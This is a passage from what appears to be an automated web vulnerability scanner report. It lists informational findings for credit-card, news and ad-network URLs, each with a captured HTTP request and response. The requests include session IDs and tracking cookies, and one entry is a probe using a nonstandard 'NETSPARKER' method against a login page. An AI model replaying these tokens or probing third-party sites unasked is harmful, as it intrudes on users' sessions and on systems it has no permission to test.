Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97; s_pers=%20gpv_p7%3D2011_March_ExternlAffiliates_DiamondPreferred_MC_21monthBTP%7C1308309048380%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server:
Date: Fri, 17 Jun 2011 10:40:49 GMT
Connection: close
Content-Length: 1229

$(document).ready(function() {
$('.accordion > div').hide();
var header = $('.accordion > h3');

$(header).click(function(e) {
       e.preventDefault();
   if ($(this)
...[SNIP]...

23.27. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm

Request

GET /usc/thankyou/Preferred/external/May2011/50GC/js/jquery-1.htm HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer%5F631524426&ProspectID=3F41C92F74AE43D4B3334B0467420B9F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_p7%3DMay_2011_DividendPlatSelect_MC_12%252F12_%2524100cashback%7C1308309039568%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server:
Date: Fri, 17 Jun 2011 10:40:46 GMT
Connection: close
Content-Length: 77746

/*!
* jQuery JavaScript Library v1.4.3
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

23.28. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

Request

Response

23.29. http://ds.addthis.com/red/psi/sites/www.cnbc.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/www.cnbc.com/p.json

Request

GET /red/psi/sites/www.cnbc.com/p.json?callback=_ate.ad.hpr&uid=4dce8a530508b02d&url=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860%2FEnergy_Transfer_to_Buy_Southern_Union_for_4_4_Billion&ref=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&rdo31 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; dt=X; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1308181159.1FE|1306359996.1OD|1308181159.60|1308181159.1EY; psc=4; uid=4dce8a530508b02d

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 16 Jun 2011 12:52:27 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 16 Jul 2011 12:52:27 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 16 Jun 2011 12:52:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 12:52:27 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

23.30. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Request

GET /activityi;src=490793;type=healt926;cat=wsjco604;ord=3293442677240.819? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Thu, 16 Jun 2011 11:22:21 GMT
Expires: Thu, 16 Jun 2011 11:22:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>

23.31. http://m.cnbc.com/mytest/ipecho.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/mytest/ipecho.php

Request

GET /mytest/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: USERFONTSIZE=1; s_cc=true; s_sq=%5B%5BB%5D%5D; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2001|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_321|Q_316; __qca=P0-1930011807-1308223509319; s_nr=1308223605121

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:26:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Cache-Control: max-age=1
Expires: Thu, 16 Jun 2011 11:26:49 GMT
Vary: Accept-Encoding
Content-Type: text/html
Via: 1.1 aicache6
Content-Length: 61
X-Aicache-OS: 64.210.193.250:80
Connection: Keep-Alive
Keep-Alive: max=20

getip({"ip": "64.210.193.253", "address":"173.193.214.243"});

23.32. http://online.wsj.com/public/resources/live/2_3001_HP_JSON.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/public/resources/live/2_3001_HP_JSON.js

Request

GET /public/resources/live/2_3001_HP_JSON.js?dojo.preventCache=1308223342031 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3dna%7c%7czip%3d20001%2d20020%7c%7ccountry%3dus%7c%7cregion%3ddc%7c%7cORCS%3dna%2cus%7c%7ccity%3dwashington%7c%7clongitude%3d%2d77.0369%7c%7ctimezone%3dest%7c%7clatitude%3d38.8951; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D; _chartbeat2=wh4hk9xmdxztvs8m

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=2592000, public
Expires: Sat, 16 Jul 2011 11:22:22 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 9444
Content-Type: text/html

{"timeStamp":"7:20 a.m. EDT 06/16/11","treasuries":[{"last":"0.1600","yield":"0.1620","sym":"US1YN","symsid":"UST1YR&page=bond","chg":"-0.02","pchg":"-11.11","timestamp":"7:03 a.m. 6/16/11","name"
...[SNIP]...

23.33. http://online.wsj.com/static_html_files/WSJThirdParty_Footer_Nav.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/static_html_files/WSJThirdParty_Footer_Nav.html

Request

GET /static_html_files/WSJThirdParty_Footer_Nav.html HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://commerce.wsj.com/auth/forgotpass?mod=WSJ_formfactor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2235%22%2C%22high%22%3A%5B%2281%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DThu%2C%2016%20Jun%202011%2011%3A42%3A22%20GMT%7C%7CweatherCode%3D10005; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:25 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=2592000, public
Expires: Sat, 16 Jul 2011 11:24:25 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 14287
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

23.34. http://online.wsj.com/static_html_files/WSJThirdParty_Header_Nav_Commerce.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/static_html_files/WSJThirdParty_Header_Nav_Commerce.html

Request

GET /static_html_files/WSJThirdParty_Header_Nav_Commerce.html HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://commerce.wsj.com/auth/forgotpass?mod=WSJ_formfactor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; wsjregion=na%2cus; s_vnum=1310602431737%26vn%3D2; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2235%22%2C%22high%22%3A%5B%2281%22%5D%2C%22low%22%3A%5B%2265%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DThu%2C%2016%20Jun%202011%2011%3A42%3A22%20GMT%7C%7CweatherCode%3D10005; DJSESSION=continent%3Dna%7C%7Czip%3D20001-20020%7C%7Ccountry%3Dus%7C%7Cregion%3Ddc%7C%7CORCS%3Dna%2Cus%7C%7Ccity%3Dwashington%7C%7Clongitude%3D-77.0369%7C%7Ctimezone%3Dest%7C%7Clatitude%3D38.8951%7C%7CBIZO%3Dbiz%3D1080%3Bbiz%3D1027%3Bbiz%3D1053%3B; s_cc=true; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; s_invisit=true; s_sq=djglobal%2Cdjwsj%3D%2526pid%253DWSJ_U.S.%252520Home_0_0_WH_0001_public%2526pidt%253D1%2526oid%253Dhttp%25253A//commerce.wsj.com/auth/forgotpass%25253Fmod%25253DWSJ_formfactor%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:24:20 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=2592000, public
Expires: Sat, 16 Jul 2011 11:24:20 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 20639
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

23.35. http://optimized-by.rubiconproject.com/a/dk.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.html

Request

GET /a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308237977515&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_2081=AG-00000001389358554; put_1185=4325897289836481830; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^7^1308225202^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; khaos=GOVBRMNC-I-DXQD; rpb=4940%3D1%264894%3D1%265852%3D1%264210%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1; cd=false; rdk2=0; ses2=11953^37; csi2=2553662.js^11^1308233336^1308237980&1295118.js^1^1308235192^1308235192&3187870.js^20^1308226504^1308234260&1295153.js^2^1308228373^1308233637&3206203.js^2^1308230851^1308232093&3183300.js^1^1308227126^1308227126; rdk=6451/11953; rdk15=0; ses15=11953^43; csi15=1300434.js^1^1308237982^1308237982&2553663.js^11^1308234261^1308237668&1295121.js^1^1308235497^1308235497&1295156.js^2^1308233638^1308233949&3187871.js^25^1308225219^1308233336&3206204.js^3^1308225202^1308227128

Response

23.36. http://pbid.pro-market.net/engine previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pbid.pro-market.net
Path:	/engine

Request

Response

23.37. http://platform.twitter.com/widgets/follow_button.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://platform.twitter.com
Path:	/widgets/follow_button.html

Request

Response

23.38. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Request

Response

23.39. https://soundcloud.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login

Request

NETSPARKER /login?ref=top HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: soundcloud.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Thu, 16 Jun 2011 19:29:26 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 183

<html><body><h1>500 Internal Server Error</h1>If you are the administrator of this website, then please read this web application's log file to find out what went wrong.</body></html>

23.40. http://switch.atdmt.com/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://switch.atdmt.com
Path:	/jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8

Request

GET /jaction/COCC_WS_CapitalOnePlatinumPrestige/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.8 HTTP/1.1
Host: switch.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/platinum-prestige-credit-card/11858/8/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85808EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 17 Jun 2011 10:40:34 GMT
Connection: close
Content-Length: 1539

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://ad.yieldmanager.com/pixel?id=728614&t=2','https://www.googl
...[SNIP]...

23.41. http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://switch.atdmt.com
Path:	/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

Request

GET /jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15 HTTP/1.1
Host: switch.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/?linkid=WWW_1010_CARD_TGAFF01_Z_Z_01_T_CP85815EW
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 17 Jun 2011 10:40:52 GMT
Connection: close
Content-Length: 1542

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://ad.yieldmanager.com/pixel?id=728678&t=2','https://www.googl
...[SNIP]...

23.42. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Request

Response

23.43. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/728x90/atf

Request

Response

23.44. http://tags.bluekai.com/site/2939 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/2939

Request

Response

23.45. http://tf.nexac.com/media/1809966/na.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tf.nexac.com
Path:	/media/1809966/na.html

Request

GET /media/1809966/na.html HTTP/1.1
Host: tf.nexac.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308233327911&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
Date: Thu, 16 Jun 2011 14:08:54 GMT
X-Function: 301
Last-Modified: Thu, 1 Jan 1970 00:00:00 GMT
Expires: Tue, 31 Dec 2030 00:00:00 GMT
Cache-Control: public
Content-Type: text/html
Content-Length: 762
Connection: keep-alive

<script type="text/javascript">

function getNaID() {
var cookieName = "na_id";
var nextacCookie = "" + document.cookie;
var startIndex = nextacCookie.indexOf(cookieName);
if (startIndex != -1)
...[SNIP]...

23.46. http://uac.advertising.com/wrapper/aceUACping.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://uac.advertising.com
Path:	/wrapper/aceUACping.htm

Request

GET /wrapper/aceUACping.htm HTTP/1.1
Host: uac.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308246973695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
